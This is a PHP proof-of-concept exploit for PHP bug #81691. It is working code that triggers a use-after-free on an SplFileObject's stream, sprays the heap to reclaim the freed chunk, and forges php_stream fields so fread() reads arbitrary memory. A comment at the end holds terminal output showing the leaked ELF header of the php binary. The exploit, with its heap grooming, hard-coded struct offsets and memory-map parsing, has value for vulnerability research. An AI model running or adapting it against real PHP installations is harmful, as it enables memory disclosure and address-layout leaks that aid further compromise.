PoC BUG #81691 (PHP)
<?php
// BUG #81691 https://bugs.php.net/bug.php?id=81691
// PoC: information leak (arbitrary memory read) via use-after-free of the php_stream
// behind an SplFileObject -- the stream is fclose()d while the object still holds it,
// the freed chunk is reclaimed by a string we control, and fread() then copies from
// whatever address we forge into that string.
// Run with the Zend memory manager disabled so the freed struct goes back to the
// system allocator and can be reclaimed by the spray string:
//   export USE_ZEND_ALLOC=0
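/**
 * Locate the executable (r-xp) mapping of the running php binary.
 *
 * Parses a /proc/<pid>/maps-style listing and returns the bounds of the first
 * line that contains both $needle and "r-xp". The match is a plain substring
 * test: any mapped object or directory whose path contains "php" and that
 * sorts at a lower address would be picked instead of the interpreter itself,
 * so callers should sanity-check the bytes they leak (e.g. the ELF magic).
 *
 * @param string $maps_path maps listing to parse (default: this process)
 * @param string $needle    substring that identifies the target mapping
 * @return array{bin_start:int,bin_end:int} start/end address of the mapping
 * @throws RuntimeException when the file cannot be read or nothing matches
 *                          (the original silently returned null here, which
 *                          made the caller forge an address near 0 and crash)
 */
function maps($maps_path = "/proc/self/maps", $needle = "php") {
    $contents = file_get_contents($maps_path);
    if ($contents === false) {
        throw new RuntimeException("maps: cannot read " . $maps_path);
    }
    foreach (explode(PHP_EOL, $contents) as $line) {
        if (strpos($line, $needle) === false || strpos($line, "r-xp") === false) {
            continue;
        }
        // Line format: "start-end perms offset dev inode [path]"
        $fields = explode(" ", $line);
        $bounds = explode("-", $fields[0]);
        if (count($bounds) !== 2) {
            continue;
        }
        return [
            "bin_start" => hexdec($bounds[0]),
            "bin_end"   => hexdec($bounds[1]),
        ];
    }
    throw new RuntimeException("maps: no '" . $needle . "' r-xp mapping found in " . $maps_path);
}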
/**
 * Split a hex string into byte pairs and return them least-significant first.
 *
 * "0011223344556677" -> ["77","66","55","44","33","22","11","00"], i.e. the
 * order in which the bytes must be written to memory on a little-endian
 * target (see overwritebytes()). No validation is done: an odd-length input
 * leaves a lone nibble as the first element of the result.
 *
 * @param string $hex big-endian hex digits, no "0x" prefix
 * @return string[] two-character chunks in little-endian order
 */
function hex2le($hex) {
    $big_endian = str_split($hex, 2);
    $little_endian = [];
    for ($i = count($big_endian) - 1; $i >= 0; $i--) {
        $little_endian[] = $big_endian[$i];
    }
    return $little_endian;
}
/**
 * Patch $target in place with the bytes in $data, starting at $offset.
 *
 * Each element of $data is a two-digit hex value (as produced by hex2le())
 * and becomes one byte of $target. Callers must keep $offset + count($data)
 * within strlen($target): PHP pads a string with spaces when a character
 * offset past its end is assigned, which would silently change the size of
 * the buffer being used as a fake struct.
 *
 * @param string[] $data   hex byte values, e.g. ["ef", "be", "ad", "de"]
 * @param string   $target buffer to patch (modified by reference)
 * @param int      $offset index of the first byte to overwrite
 */
function overwritebytes($data, &$target, $offset) {
    foreach (array_values($data) as $idx => $hexbyte) {
        $target[$offset + $idx] = chr(hexdec($hexbyte));
    }
}
/**
 * Zero-extend a hex string on the left to 16 digits (one 64-bit value).
 *
 * Inputs that are already 16 characters or longer are returned unchanged.
 *
 * @param string $string hex digits without "0x"
 * @return string 16-digit (or longer) hex string
 */
function leftpad($string) {
    $missing = 16 - strlen($string);
    if ($missing <= 0) {
        return $string;
    }
    return str_repeat('0', $missing) . $string;
}
// Shared state between pwn::uaf(), pwn::_read() and the driver code at the
// bottom: $file is the SplFileObject whose stream gets freed, $dummy is the
// string intended to reclaim the freed chunk and then patched into a fake
// stream struct. At file scope "global" is effectively a no-op; it only
// documents the intent.
global $file, $dummy;
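/**
 * Drives the use-after-free: frees the php_stream behind an SplFileObject,
 * reclaims the freed chunk with a string we control, then forges stream
 * fields inside that string so SplFileObject::fread() copies from an
 * arbitrary address.
 *
 * The field offsets below are byte positions inside $dummy's character data
 * and encode the php_stream layout of the build this PoC was written against.
 * They are not portable: any other PHP version/build needs them re-derived
 * (from the struct definition or a debugger). The script must also run with
 * USE_ZEND_ALLOC=0 so the freed struct and $dummy share the system allocator.
 */
class pwn {
    // php_stream field offsets, relative to the first byte of $dummy.
    const OFF_POSITION   = 128;
    const OFF_READBUF    = 136;
    const OFF_READBUFLEN = 144;
    const OFF_READPOS    = 152;
    const OFF_WRITEPOS   = 160;
    const OFF_CHUNK_SIZE = 168;

    // Size of the strings used to groom the heap and reclaim the freed chunk.
    const SPRAY_SIZE = 200;

    /**
     * Trigger the use-after-free and reclaim the freed stream struct.
     *
     * 1. Allocate 100 same-sized strings (presumably heap grooming, to make
     *    the allocator state around the stream's chunk predictable).
     * 2. Open /dev/null through SplFileObject, which keeps a stream pointer.
     * 3. fclose() the underlying resource directly: the stream is freed while
     *    the SplFileObject still references it (the bug).
     * 4. Allocate $dummy with the same size so it lands in the freed chunk.
     *
     * Assumes the stream is the most recently created resource; in a script
     * with other open resources end(get_resources()) would close the wrong one.
     */
    public function uaf() {
        global $file, $dummy;
        $contiguous = [];
        for ($i = 0; $i < 100; $i++) {
            $contiguous[] = str_shuffle(str_repeat('A', self::SPRAY_SIZE));
        }
        // Create
        $file = new SplFileObject("/dev/null");
        // Free. end() takes its argument by reference and emits
        // "Only variables should be passed by reference" when handed a
        // temporary, so fetch the resource list into a variable first.
        $resources = get_resources();
        fclose(end($resources));
        // Fill
        $dummy = str_repeat('X', self::SPRAY_SIZE);
    }

    /**
     * Point the forged stream's read buffer at $address so the next
     * $file->fread() returns bytes from that address.
     *
     * @param string $address target address as hex digits (no "0x")
     * @param string $size    byte count as hex digits; it is written to
     *                        readbuflen, writepos and chunk_size so fread()
     *                        believes exactly that many bytes are buffered
     *                        (position and readpos are zeroed)
     */
    public function _read($address, $size) {
        global $dummy;
        $this->setField($dummy, self::OFF_READBUF, $address);
        $this->setField($dummy, self::OFF_POSITION, "00");
        $this->setField($dummy, self::OFF_READBUFLEN, $size);
        $this->setField($dummy, self::OFF_READPOS, "00");
        $this->setField($dummy, self::OFF_WRITEPOS, $size);
        $this->setField($dummy, self::OFF_CHUNK_SIZE, $size);
    }

    /**
     * Write one 64-bit little-endian field into the forged struct.
     *
     * @param string $buf    buffer holding the forged struct (by reference)
     * @param int    $offset field offset inside $buf
     * @param string $hex    value as hex digits, zero-extended to 8 bytes
     */
    private function setField(&$buf, $offset, $hex) {
        overwritebytes(hex2le(leftpad($hex)), $buf, $offset);
    }
}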
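// --- driver: leak the first ~0x1000 bytes of the php binary's text mapping ---
$bin = maps();
if (!is_array($bin) || !isset($bin["bin_start"])) {
    // Without a located mapping the forged readbuf would point near address 0.
    fwrite(STDERR, "could not locate the php r-xp mapping in /proc/self/maps" . PHP_EOL);
    exit(1);
}
$pwn = new pwn();
$pwn->uaf();
// Read in 0xff-byte chunks. The last iteration starts at 0xff0 and reads up to
// 0x10ef, slightly past 0x1000; assumed to still lie inside the mapping.
for ($i = 0; $i < 0x1000; $i += 0xff) {
    $pwn->_read(dechex($bin["bin_start"] + $i), "ff");
    print $file->fread(0xff);
}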
/*
psyconauta@insulatergum ᐓ ~/research/php-uaf |
ᐓ php uaf-leak.php | xxd
00000000: 7f45 4c46 0201 0103 0000 0000 0000 0000 .ELF............
00000010: 0300 3e00 0100 0000 e08e 0f00 0000 0000 ..>.............
00000020: 4000 0000 0000 0000 0802 1502 0000 0000 @...............
00000030: 0000 0000 4000 3800 0900 4000 2700 2600 ....@.8...@.'.&.
00000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000 @.......@.......
00000060: f801 0000 0000 0000 f801 0000 0000 0000 ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
00000080: 3802 0000 0000 0000 3802 0000 0000 0000 8.......8.......
00000090: 3802 0000 0000 0000 1c00 0000 0000 0000 8...............
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000 ................
000000b0: 0100 0000 0500 0000 0000 0000 0000 0000 ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000d0: dc81 ae00 0000 0000 dc81 ae00 0000 0000 ................
000000e0: 0000 2000 0000 0000 0100 0000 0600 0000 .. .............
000000f0: 60c9 b600 0000 0000 60c9 d600 0000 0000 `.......`.......
00000100: 60c9 d600 0000 0000 7865 0900 0000 0000 `.......xe......
00000110: d03f 0b00 0000 0000 0000 2000 0000 0000 .?........ .....
00000120: 0200 0000 0600 0000 60fb bf00 0000 0000 ........`.......
00000130: 60fb df00 0000 0000 60fb df00 0000 0000 `.......`.......
00000140: 4002 0000 0000 0000 4002 0000 0000 0000 @.......@.......
00000150: 0800 0000 0000 0000 0400 0000 0400 0000 ................
00000160: 5402 0000 0000 0000 5402 0000 0000 0000 T.......T.......
00000170: 5402 0000 0000 0000 4400 0000 0000 0000 T.......D.......
00000180: 4400 0000 0000 0000 0400 0000 0000 0000 D...............
00000190: 50e5 7464 0400 0000 5081 a700 0000 0000 P.td....P.......
000001a0: 5081 a700 0000 0000 5081 a700 0000 0000 P.......P.......
000001b0: a4e1 0000 0000 0000 a4e1 0000 0000 0000 ................
000001c0: 0400 0000 0000 0000 51e5 7464 0600 0000 ........Q.td....
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001f0: 0000 0000 0000 0000 1000 0000 0000 0000 ................
00000200: 52e5 7464 0400 0000 60c9 b600 0000 0000 R.td....`.......
00000210: 60c9 d600 0000 0000 60c9 d600 0000 0000 `.......`.......
00000220: a036 0900 0000 0000 a036 0900 0000 0000 .6.......6......
00000230: 0100 0000 0000 0000 2f6c 6962 3634 2f6c ......../lib64/l
00000240: 642d 6c69 6e75 782d 7838 362d 3634 2e73 d-linux-x86-64.s
00000250: 6f2e 3200 0400 0000 1000 0000 0100 0000 o.2.............
00000260: 474e 5500 0000 0000 0200 0000 0600 0000 GNU.............
00000270: 2000 0000 0400 0000 1400 0000 0300 0000 ...............
00000280: 474e 5500 5c5d 5f93 a3af 1a6f e97e 0542 GNU.\]_....o.~.B
*/
?>